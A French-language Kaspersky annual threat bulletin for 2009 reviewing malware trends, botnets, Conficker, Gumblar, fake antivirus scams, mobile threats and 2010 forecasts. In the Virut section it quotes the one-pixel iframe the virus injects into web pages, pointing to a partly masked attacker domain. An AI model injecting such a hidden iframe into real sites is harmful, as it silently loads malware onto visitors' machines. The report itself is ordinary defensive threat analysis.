Bulletin de Kaspersky sur la sécurité en 2009. Développement des menaces en 2009

  1. Bulletin de Kaspersky sur la sécurité en 2009. Développement des menaces en 2009
  2. Bulletin de Kaspersky sur la sécurité. Principales statistiques pour 2009
  3. Spam en 2009

Tendances de l’année

L’année 2009 aura marqué une étape supplémentaire aussi bien dans l’histoire des applications malveillantes que dans celle de la cyber criminalité. Le développement de ces deux secteurs a pris une fois de plus une nouvelle direction. Les fondations de ce que nous allons connaître au cours des prochaines années ont été jetées en 2009.

En 2007 et 2008, les programmes malveillants ont cessé d’être développés à des fins non commerciales. Le cheval de Troie devint la principale catégorie de programmes malveillants, utilisés dans le vol de données. La majorité des cyber criminels était intéressée par les données des adeptes des jeux en ligne : les mots de passe, les personnages et les biens virtuels.

Au cours des 3 à 4 dernières années, la Chine est devenue la principale source de programmes malveillants. Le milieu cyber délinquant chinois a été capable de produire une telle quantité de programmes malveillants que les éditeurs de logiciels antivirus ont consacré tous leurs efforts au cours de ces deux dernières années à endiguer ce flot.

Les statistiques présentées par les différents éditeurs de logiciels varient (certains tiennent compte des fichiers, d’autres des signatures ou d’autres encore, des attaques), mais toutes indiquent une croissance rapide du nombre de nouveaux programmes malveillants dans un passé récent. Ainsi, les données de Kaspersky Lab indiquent la découverte de près de 2 millions de programmes malveillants uniques sur une période de 15 ans (de 1992 à 2007). Pour 2008 seulement, ce chiffre est de 15 millions.

En 2009, le nombre de programmes malveillants figurant dans les collections de Kaspersky Lab a atteint 33,9 millions exemplaires.


Nombre de programmes malveillants dans la collection de Kaspersky Lab

En 2007 et 2009, le nombre de nouvelles menaces a sensiblement augmenté. La seule riposte envisageable était de renforcer les centres de traitement antivirus (et le développement des technologies antivirus de type « in-the-cloud »), de développer de nouveaux outils de détection automatiques, d’introduire de nouvelles méthodes d’analyse heuristique et des technologies de virtualisation et d’analyse du comportement.

Face à l’augmentation du nombre de menaces, le secteur de la lutte contre les virus a introduit de nouvelles technologies visant à améliorer la qualité de la protection. Nous pouvons affirmer que nous avons connu une révolution technique. Les solutions antivirus proposées dans les années 1990 (analyseur et contrôle) offraient toujours un niveau de protection adéquat en 2006, par exemple, mais en 2009, elles sont devenues complètement obsolètes et ont été pratiquement remplacées par des solutions combinées (des logiciels du type Internet Security) qui regroupent toutes les technologies pour une protection à plusieurs niveaux.

Alors qu’au cours de la période 2007-2008, le nombre de nouvelles menaces avait connu une croissance arithmétique, le nombre de nouveaux programmes découverts en 2009 fut pratiquement égal à celui de 2008, soit près de 15 millions.


Nombre de nouveaux programmes malveillants découverts par Kaspersky Lab
(2003-2009)

Plusieurs éléments expliquent cette stabilisation. L’explosion enregistrée en 2008 fut provoquée non seulement par un développement actif de virus en Chine, mais également par la poursuite du développement des technologies d’infection des fichiers (ce qui a entraîné une augmentation du nombre de fichiers malveillants uniques) ainsi que par un déplacement du vecteur des attaques du côté des navigateurs Web.

Toutes ces tendances ont été maintenues en 2009, bien que le développement se soit atténué. De plus, nous avons pu observer une réduction de l’activité de toute une série de chevaux de Troie, par exemple les chevaux de Troie de jeux. En ce qui concerne ces derniers, le scénario que nous avions prévu à la fin de l’année dernière s’est vérifié dès la fin du premier semestre 2009. La concurrence acharnée dans ce marché, le recul des revenus des cyber criminels et la lutte active menée par les éditeurs de logiciels antivirus ont entraîné une réduction du nombre de chevaux de Troie visant les jeux, phénomène également constaté par d’autres éditeurs à la mi-2009.

La réduction du nombre de chevaux de Troie visant les jeux est due au fait que les éditeurs de jeu ont prêté attention à la problématique de la sécurité et que de nombreux utilisateurs ont adopté des mesures de protection contre ces menaces.

Les succès remportés par les autorités judiciaires, les structures de contrôle, les compagnies de télécommunications et les éditeurs de logiciels antivirus contre les services d’hébergement clandestin ont permis de réduire le nombre de programmes malveillants. Les premiers succès furent remportés à la fin de l’année 2008 avec la fermeture de services tels que McColo, Atrivo et EstDomains. La lutte s’est poursuivie en 2009 et a permis de mettre un terme aux activités de UkrTeleGroup, RealHost et 3FN.

Ces services s’étaient rendus tristement célèbres en offrant divers services aux cyber criminels de tout calibre tels que la prise en charge des centres d’administration des réseaux de zombies, des ressources d’hameçonnage, des sites abritant des codes d’exploitation, des diffuseurs de messages non sollicités, etc.

La fermeture de ces services d’hébergement « gris » n’entraîna malheureusement pas l’arrêt total des activités des cyber escrocs car après quelque temps, ceux-ci trouvèrent un nouveau refuge, mais Internet devint plus sûr pendant ces « migrations ».

Pour l’instant, tout semble indiquer que la tendance va se maintenir et le nombre de programmes malveillants uniques qui vont être créés en 2010 sera identique aux chiffres de 2009.

Bilan de l’année

Les principaux thèmes de l’année 2009 ont été les programmes malveillants avec fonction de dissimulation de l’activité, des épidémies globales, le ver Kido, les attaques via Internet, les réseaux de zombies Internet, les escroqueries via SMS et les attaques menées via les réseaux sociaux.

Des programmes de plus en plus complexes

En 2009, les programmes malveillants sont devenus plus complexes. Alors que les familles de programmes malveillants dotés d’une fonction de dissimulation de l’activité se comptaient en dizaines, ce genre de programmes s’est non seulement largement diffusé en 2009 mais ils ont également fortement évolué. Parmi ceux-ci, il convient de citer des menaces telles que Sinowal (bootkit), TDSS, Clampi.

Cela fait deux ans maintenant que nos spécialistes suivent le développement de Sinowal et au printemps 2009, nous avons identifié une nouvelle vague de diffusion. Le bootkit, capable de bien dissimuler sa présence dans le système et indétectable par la majorité des logiciels antivirus de l’époque, était à ce moment le programme malveillant le plus avancé. De plus, Sinowal luttait activement contre les tentatives menées par les éditeurs de logiciels antivirus pour mettre le centre d’administration du réseau de zombies hors service.

Le bootkit se propageait via des sites compromis, des sites pornographiques et des sites qui proposent des applications piratées à télécharger. Presque tous les serveurs à l’origine des infections d’ordinateurs fonctionnaient dans le cadre de « programmes de partenariats », à savoir des plans d’échange entre les propriétaires de sites et les auteurs de programmes malveillants. Ces « partenariats » sont très populaires dans les milieux cybercriminels russe et ukrainien.

TDSS, un autre programme malveillant, fut la manifestation de deux technologies parmi les plus complexes : il infectait les pilotes système de Windows et créait son propre système de fichiers virtuels dans lequel il dissimulait son code malveillant principal. TDSS fut le premier programme malveillant capable de s’infiltrer dans le système à ce niveau. Aucun programme malveillant de ce genre n’existait avant.

Clampi s’est retrouvé dans le collimateur des experts en 2009, après l’enregistrement de l’infection par ce programme de plusieurs grandes entreprises et institutions américaines. Ce programme malveillant, dont l’apparition remonte à 2008 et qui serait d’origine russe, cherchait à voler les données d’accès à plusieurs systèmes de banques en ligne. La modification apparue en 2009 se distinguait de ses prédécesseurs non seulement par une structure complexe et multimodale (en de nombreux points semblables à celle retrouvée dans un autre cheval de Troie tristement célèbre, Zbot), mais également par un modèle de communication subtil avec le réseau de zombies reposant sur le cryptage du trafic à l’aide de RSA. Un autre trait remarquable de Clampi fut l’utilisation d’utilitaires standard de Windows au moment de la diffusion à l’intérieur du réseau lors de l’infection. Ceci entraîna quelques problèmes pour certains logiciels antivirus qui ne parvenaient pas à bloquer les « applications saines » et par conséquent, qui ne pouvaient éviter l’infection.

Malheureusement, ces menaces se distinguent également par une large diffusion sur Internet. Aussi bien Sinowal que Clampi ont atteint le niveau d’une épidémie mondiale et TDSS a été à l’origine d’une des épidémies les plus importantes de 2009. La variante Packed.Win32.Tdss.z, apparue en septembre et baptisée TDL3, a été particulièrement bien diffusée.

Épidémies

Nous avions prédit une augmentation du nombre d’épidémies internationales par rapport à l’année passée. Malheureusement, cette prévision s’est vérifiée. Le niveau d’épidémie internationale a été atteint non seulement par les menaces citées ci-dessus, mais également par toute une série de programmes malveillants dangereux.

Attaques contre les ordinateurs des utilisateurs

Les données recueillies à l’aide de Kaspersky Security Network nous permettent de conclure que le seuil du million de systèmes attaqués en 2009 a été franchi par les programmes malveillants suivants :

  • Kido : ver
  • Sality : virus – ver
  • Brontok : ver
  • Mabezat : ver
  • Parite.b : virus de fichier
  • Virut.ce : virus bot
  • Sohanad : ver

TDSS.z : outil de dissimulation d’activité – porte dérobée

L’épidémie la plus importante de l’année fut sans conteste celle provoquée par le ver Kido (Conficker) à l’origine de l’infection de millions d’ordinateurs dans le monde entier. Ce ver utilise plusieurs méthodes pour s’introduire dans l’ordinateur des victimes : collecte des mots de passe d’accès aux ressources de réseau, diffusion via les clés USB, exploitation de la vulnérabilité Windows MS08-067. Chaque ordinateur infecté était intégré à un réseau de zombies. La lutte contre le réseau de zombies ainsi créé fut compliquée par le fait que Kido exploitait les technologies de création de virus les plus modernes et les plus efficaces. Ainsi, une des modifications du ver récupérait des mises à jour depuis cinq cents domaines dont les adresses étaient sélectionnées au hasard chaque jour dans une liste de 50 000 adresses et les connexions de type P2P étaient également utilisées comme canal de mise à jour. Kido s’oppose à la mise à jour des applications de protection et désactive les services de sécurité, bloque l’accès aux sites des éditeurs de logiciels antivirus, etc.

Les auteurs de Kido sont restés relativement calmes jusqu’en mars 2009. Selon les estimations de nos spécialistes, le ver aurait pu infecter jusqu’à 5 millions d’ordinateurs dans le monde entier jusqu’à cette date. Kido ne contenait pas de fonctionnalités de diffusion de messages non sollicités ou d’organisation d’attaques par déni de service distribué. Les enquêteurs s’attendaient à ce que ces fonctionnalités apparaissent à partir du 1er avril car c’est ce jour-là que la version de Kido diffusée en mars devait commencer à essayer de télécharger des modules complémentaires. Toutefois, les auteurs de ver préférèrent attendre quelques jours et c’est au cours de la nuit du 8 au 9 avril que les ordinateurs infectés reçurent l’instruction de récupérer la mise à jour via une connexion P2P. Outre la mise à jour de Kido, deux autres applications furent téléchargées sur les ordinateurs infectés. La première fut un ver de messagerie de la famille Email-Worm.Win32.Iksmas chargé de diffuser des messages non sollicités. La deuxième application était un faux antivirus de la famille FraudTool.Win32.SpywareProtect2009 qui demandait le versement d’une somme d’argent pour la suppression de prétendus programmes malveillants découverts sur l’ordinateur.

Il faut signaler que la lutte contre cette menace si répandue a nécessité la création d’un groupe spécial baptisé Conficker Working Group réunissant des éditeurs de logiciels antivirus, des fournisseurs d’accès Internet, des groupes d’études indépendants, des institutions académiques et des organismes régulateurs. Il s’agit du premier cas de coopération internationale d’envergure dépassant les contacts habituels entre spécialistes de la lutte contre les virus et il pourrait bien servir de base à un organisme permanent de lutte contre les menaces qui terrorisent le monde entier.

L’épidémie de Kido s’est poursuivie tout au long de l’année 2009. En novembre, le nombre de systèmes infectés dépassait les 7 millions d’unités.

Développement de l’épidémie de Kido. Source : www.shadowserver.org

Sur la base de l’expérience tirée des vers au fonctionnement identique (Lovesan, Sasser, Slammer), nous pensons que l’épidémie internationale de Kido se maintiendra en 2010.

Nous ne pouvons ignorer l’épidémie provoquée par le virus Virut. Virus.Win32.Virut.ce s’en prend aux serveurs Web. Le mode d’infection mérite quelques explications : le virus ne se contente pas d’infecter les fichiers exécutables portant les extensions .EXE et .SCR. Il ajoute également un code à la fin des fichiers Web du serveur infecté portant les extensions HTM, PHP et ASP sous la forme d’un lien, par exemple :

<iframe src= »http://ntkr(xxx).info/cr/?i=1″ width=1 height=1> </ iframe>

Lors de la visite d’une ressource légitime infectée, le contenu malveillant préparé par l’individu mal intentionné est chargé via le lien ajouté par le virus sur l’ordinateur de la victime qui ne soupçonne rien. De plus, ce virus se propage dans les réseaux P2P avec les programmes de génération de clés et les fichiers d’installation d’applications populaires. Le but poursuivi par l’infection est d’unir les ordinateurs infectés dans un réseau de zombies IRC utilisé pour la diffusion du courrier indésirable.

Infection des sites Internet

Une des épidémies les plus importantes sur Internet qui a touché des dizaines de milliers de sites Web fut provoquée par plusieurs vagues d’attaques de Gumblar. Dans la première version, les pages Web de sites légitimes étaient infectées par le corps du script. Le script inséré redirigeait les requêtes, à l’insu du visiteur de la page infectée, vers le site des individus mal intentionnés qui diffusaient le programme malveillant.

Gumblar doit son nom au site malveillant vers lequel les visiteurs des sites compromis étaient envoyés lors de la première attaque et d’où l’infection avait lieu. Ces attaques furent une illustration on ne peut plus claire des technologies Malware 2.5 que nous avions évoquées au début de l’année.

En automne, les liens vers les sites des cyber criminels placés sur les ressources compromises furent remplacés par des liens vers d’autres ressources légitimes infectées, ce qui compliqua la lutte contre l’épidémie Gumblar.

Pourquoi Gumblar s’est-il diffusé si rapidement ? La réponse est simple : le système est entièrement automatisé. Nous sommes face à une nouvelle génération de réseaux de zombies qui se développent automatiquement. Le système attaque les visiteurs de sites Web et après l’infection de l’ordinateur par un fichier exécutable pour Windows, il vole les données d’accès FTP sur les machines des victimes. Les données d’accès FTP du serveur servent ensuite à infecter toutes les pages sur de nouveaux serveurs Web. Ainsi, le système augmente le nombre de pages infectées et, par conséquent, le nombre d’ordinateurs infectés augmente également. Tout le processus est automatisé et le propriétaire du système n’a qu’à régler le fonctionnement de celui-ci et actualiser le fichier exécutable du cheval de Troie qui vole les mots de passe ainsi que les codes d’exploitation utilisés pour les attaques contre les navigateurs. Le système fonctionne en cycle fermé : il attaque de nouveaux ordinateurs, récupère les données d’accès à de nouveaux serveurs FTP et infecte de nouveaux serveurs.

Escroquerie

Les escroqueries réalisées via Internet sont de plus en plus variées. Outre les attaques par hameçonnage répandues, on retrouve divers sites qui offrent un accès payant à des services (il va de soi que ces services ne sont jamais prestés). La palme d’or revient malheureusement à la Russie. Ce sont les escrocs russes qui ont lancé la création de sites proposant des services tels que « la localisation d’un individu via le GSM », « la lecture des conversations privées dans les réseaux sociaux », « la collecte d’informations », etc. La liste complète de toutes les offres possibles occuperait plusieurs pages. L’utilisateur qui souhaite profiter du service est invité à envoyer un SMS vers un numéro payant (le tarif appliqué au SMS n’est pas précisé mais peut atteindre 10 USD) ou à souscrire à une espèce « d’abonnement », à l’aide d’un SMS, qui permettra à l’individu mal intentionné de retirer de l’argent du compte mobile de la victime chaque jour.

Le nombre de tels services a atteint plusieurs centaines. Ils étaient offerts par des dizaines de « partenariats ». Afin d’attirer les utilisateurs confiants, ces individus mal intentionnés recourent à des méthodes telles que le courrier indésirable traditionnel dans le courrier électronique, les messages non sollicités dans les réseaux sociaux et les services de messagerie instantanée. Pour les diffusions ultérieures de courrier indésirable, les individus mal intentionnés ont organisé des attaques de virus et des attaques d’hameçonnage afin d’obtenir les données d’accès aux comptes des victimes, ils ont créé des dizaines de faux sites de réseau social, etc. Et ce n’est que vers la fin de l’année 2009 que cette activité s’est heurtée à la résistance sérieuse des opérateurs de téléphonie mobile, des administrateurs de réseaux sociaux et d’éditeurs de logiciels antivirus.

En évoquant Kido, nous avions attiré l’attention sur le fait que ce programme téléchargeait un faux antivirus sur l’ordinateur. Le faux antivirus doit convaincre l’utilisateur que son ordinateur est menacé (alors que ce n’est pas du tout le cas) et l’amener à dépenser de l’argent pour activer le « logiciel antivirus ». Plus l’imitation est fidèle au fonctionnement d’un logiciel antivirus légitime, plus les escrocs ont de chance d’obtenir de l’argent pour le « travail » du faux antivirus.

La popularité des faux antivirus auprès des escrocs a continué à grandir en 2009. Ils sont diffusés non seulement à l’aide d’autres programmes malveillants, mais également via la publicité sur Internet. A l’heure actuelle, de nombreux sites proposent des bannières avec des informations sur un nouveau logiciel « miracle » qui règlera tous les problèmes. Il est même probable qu’une bannière clignotante ou qu’une publicité Flash pour un « nouvel antivirus » apparaisse sur un site légitime quelconque. De plus, lorsque l’utilisateur navigue sur Internet, il peut voir des fenêtres contextuelles qui proposent de télécharger gratuitement un logiciel antivirus.

L’émergence et la large diffusion des faux antivirus s’expliquent avant tout par la facilité de leur développement, par un système ajusté de propagation efficace et par les revenus élevés que les escrocs obtiennent en un bref laps de temps. D’après les estimations offertes en novembre 2009 par le FBI, les revenus tirés par les criminels de ces faux antivirus s’élèveraient à 150 millions de dollars américains. (www.scmagazineus.com)

A l’heure actuelle, Kaspersky Lab compte dans sa collection plus de 300 familles différentes de faux antivirus.

Programmes malveillants pour les autres plateformes et appareils

S’agissant des autres plateformes telles que les systèmes d’exploitation pour appareil nomade et Mac OS, l’année 2009 aura été marquée par la poursuite des études pratiquées par les cybercriminels. Même si Apple a prêté attention aux menaces que posent les virus pour Mac en intégrant une espèce d’analyseur antivirus dans la dernière version de son système d’exploitation (avant, les représentants d’Apple affirmaient qu’aucun programme malveillant ne menaçait Mac OS), la situation est moins claire sur le front des systèmes d’exploitation pour appareils nomades. D’un côté, des événements attendus depuis longtemps se sont produits en 2009 : les premiers programmes malveillants pour iPhone ont été découverts (les vers Ike), le premier logiciel espion a été créé pour Android et les premiers incidents impliquant des programmes malveillants signés ont été enregistrés pour les téléphones intelligents tournant sous Symbian. De l’autre côté, la compétition incessante pour les parts de marché entre les systèmes d’exploitation se poursuit, ce qui ne permet pas aux auteurs de virus de concentrer leurs efforts sur l’un d’entre eux uniquement.

En 2009, nous avons découvert 39 nouvelles familles et 257 nouvelles modifications de programmes malveillants pour appareils nomades. A titre de comparaison, nous avions découvert 30 nouvelles familles et 143 nouvelles modifications en 2008. La dynamique de ces découvertes par mois ressemble à ceci :


Dynamique de l’apparition de nouvelles modifications par mois (2008-2009)

Nous avons décrit les principaux événements survenus dans le domaine des applications malveillantes pour appareils nomades dans l’article intitulé « Virologie mobile, 3e partie » Parmi les événements et les tendances remarquables en 2009, citons :

  • L’apparition d’un marché « monétarisé » pour les programmes malveillants pour appareils nomades ;
  • L’apparition de programmes malveillants « signés » fonctionnant sous Symbian S60 3rd edition ;
  • Différents types d’escroquerie par SMS ;
  • Emergence de programmes malveillants utilisés pour gagner de l’argent et capables d’établir un contact avec les serveurs distants de l’individu mal intentionné.

Les programmes malveillants capables de « communiquer » à distance avec les serveurs de l’individu mal intentionné sont peut-être la tendance la plus marquée du deuxième semestre 2009. Ils sont apparus grâce à la popularité des réseaux sans fil et de l’Internet mobile bon marché : ces deux éléments permettent aux utilisateurs de téléphones intelligents et de téléphones mobiles de se connecter fréquemment à Internet.

La communication entre les programmes malveillants pour appareils nomades et les serveurs distants offrent de nouvelles possibilités aux individus mal intentionnés :

  1. Les SMS de Troie qui envoient des SMS vers des numéros surtaxés depuis le téléphone infecté peuvent utiliser les paramètres pour envoyer des messages depuis le serveur distant. En cas de blocage du préfixe, l’individu mal intentionné ne doit pas actualiser le programme malveillant. Il lui suffit de prendre un nouveau préfixe et de le placer sur le serveur.
  2. Les programmes malveillants installés sur les appareils nomades peuvent recevoir les mises à jour depuis le serveur distant.
  3. La liaison entre les programmes malveillants pour appareils nomades et le serveur distant peut être la première étape vers l’élaboration d’un réseau de zombies qui reprendrait les appareils nomades infectés par ces programmes.

Nous pensons que cette tendance va se maintenir en 2010 et que nous allons être confrontés à un nombre important de programmes malveillants qui utilisent la connexion Internet pour exploiter leur potentiel.

L’événement unique de 2009 fut la découverte du cheval de Troie Backdoor.Win32.Skimer. Cet incident s’est produit en réalité à la fin de l’année 2008, mais ce n’est qu’au printemps 2009 qu’il a fait beaucoup parler de lui. Il s’agit du premier programme malveillant destiné aux distributeurs de billets automatiques. L’individu mal intentionné qui parvient à infecter le distributeur à l’aide d’une carte d’accès spéciale peut exécuter toute une série d’actions illégales : retirer tout l’argent présent dans le distributeur automatique ou obtenir les données des cartes de crédit des personnes qui ont utilisé le distributeur automatique infecté. Il ne fait aucun doute que ce cheval de Troie a été développé par un individu qui connaît parfaitement bien les composantes logicielle et matérielle des distributeurs automatiques. L’analyse du code du cheval de Troie permet de supposer qu’il vise principalement les distributeurs automatiques de Russie et d’Ukraine car il surveille les transactions réalisées en dollars, en roubles et en hryvnia.

Ce code peut infecter le distributeur automatique de deux manières : accès physique direct au système du distributeur ou accès via le réseau interne de la banque auquel le distributeur est connecté. Un logiciel antivirus traditionnel est parfaitement capable de lutter contre cette porte dérobée et c’est la raison pour laquelle les spécialistes de Kaspersky Lab ont vivement conseillé à toutes les banques de lancer une analyse antivirus sur tous les distributeurs automatiques exploités.

Pronostics

Voici la liste des problèmes et des événements qui, selon nous, seront les plus remarquables en 2010 :

Changement du vecteur d’attaques : les attaques via Internet seront remplacées par des attaques via les réseaux d’échange de fichiers. Il s’agit d’une conséquence de l’évolution des moyens de protection et de l’étape suivante obligée dans l’évolution chronologique : de 2000 à 2005 : attaques via le courrier électronique ; de 2005 à 2006 : attaques via le Internet ; de 2006 à 2009 : attaques via des sites Web (y compris les réseaux sociaux). Déjà en 2009, plusieurs épidémies massives de virus ont propagé des fichiers malveillants via des torrents. C’est ainsi que se sont propagées non seulement des menaces connues telles que TDSS et Virut, mais également les premières portes dérobées pour MacOS. En 2010, nous nous attendons à une augmentation sensible de ce genre d’incidents dans les réseaux P2P.

  1. Lutte pour le trafic. Les cyber criminels sont de plus en plus nombreux à vouloir légaliser leur activité et Internet offre de nombreuses manières de gagner de l’argent en générant un grand volume de trafic ciblé qui peut être créé à l’aide de réseaux de zombies. Si pour l’instant la lutte pour le trafic des réseaux de zombies oppose principalement des éléments criminels, il est possible qu’à l’avenir des services « gris » fassent leur apparition sur le marché. Les « partenariats » permettent aux propriétaires de réseaux de zombies d’être rémunérés pour leur travail, même sans des services ouvertement illégaux comme la diffusion de courrier indésirable, l’organisation d’attaques par déni de service ou la diffusion de virus.
  2. Épidémies. Comme par le passé, la principale cause des épidémies sera la découverte de vulnérabilités, non seulement dans les applications d’éditeurs tiers pour Microsoft (Adobe, Apple), mais également dans le nouveau système d’exploitation Windows 7 commercialisé récemment. Il convient de noter que ces derniers temps, les éditeurs de logiciels tiers ont commencé à accorder une attention plus poussée à la recherche des erreurs dans leurs applications. Si aucune vulnérabilité grave n’est découverte, 2010 pourrait bien être une des années les plus calmes de ces derniers temps.
  3. Les programmes malveillants vont devenir encore plus complexes. Il existe déjà des menaces qui utilisent des technologies de création de virus modernes pour l’infection des fichiers et des fonctions de rootkit. Tous les logiciels antivirus ne sont pas capables de réparer les systèmes infectés par ces programmes malveillants. La situation va se détériorer à l’avenir. D’un côté, les technologies de lutte contre les virus vont se développer afin de compliquer au maximum l’introduction des menaces dans le système. De l’autre côté, les menaces qui réussiront malgré tout à s’infiltrer seront pratiquement indétectables.
  4. La situation observée au niveau du recul de l’activité des chevaux de Troie visant les jeux va se répéter avec les faux antivirus. Ces applications, qui sont apparues en 2007, ont atteint leur pic de croissance en 2009 et elles ont participé à plusieurs épidémies importantes. À l’heure actuelle, le marché des faux antivirus est saturé et les revenus des escrocs sont minimes. L’existence de ces programmes est également compliquée par l’intérêt soutenu que leur portent les éditeurs de logiciels antivirus et les autorités judiciaires.
  5. Dans le domaine des services Web, le thème de l’année sera Google Wave et les attaques réalisées via ce service. Leur développement va suivre sans aucun doute le modèle devenu traditionnel : tout d’abord le courrier indésirable, puis les attaques d’hameçonnage, puis l’exploitation de vulnérabilités et la diffusion de programmes malveillants. La sortie de ChromeOS suscite beaucoup d’intérêt, mais nous ne pensons pas que les cybercriminels vont s’intéresser beaucoup à cette plateforme en 2010.
  6. L’année devrait être difficile pour les plateformes nomade iPhone et Android. L’apparition des premières menaces pour celles-ci en 2009 témoigne de l’augmentation de l’attention que leur porte les cybercriminels. Et si dans le cas de l’iPhone, le groupe à risque est composé uniquement des utilisateurs qui ont un appareil craqué, il n’existe aucune exception pour Android : les applications peuvent être installées depuis n’importe quelle source. La popularité croissante des téléphones tournant sous ce système d’exploitation en Chine et la faiblesse des technologies de contrôle des applications publiées vont entraîner une série d’incidents remarquables impliquant des virus en 2010.

Posts similaires

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *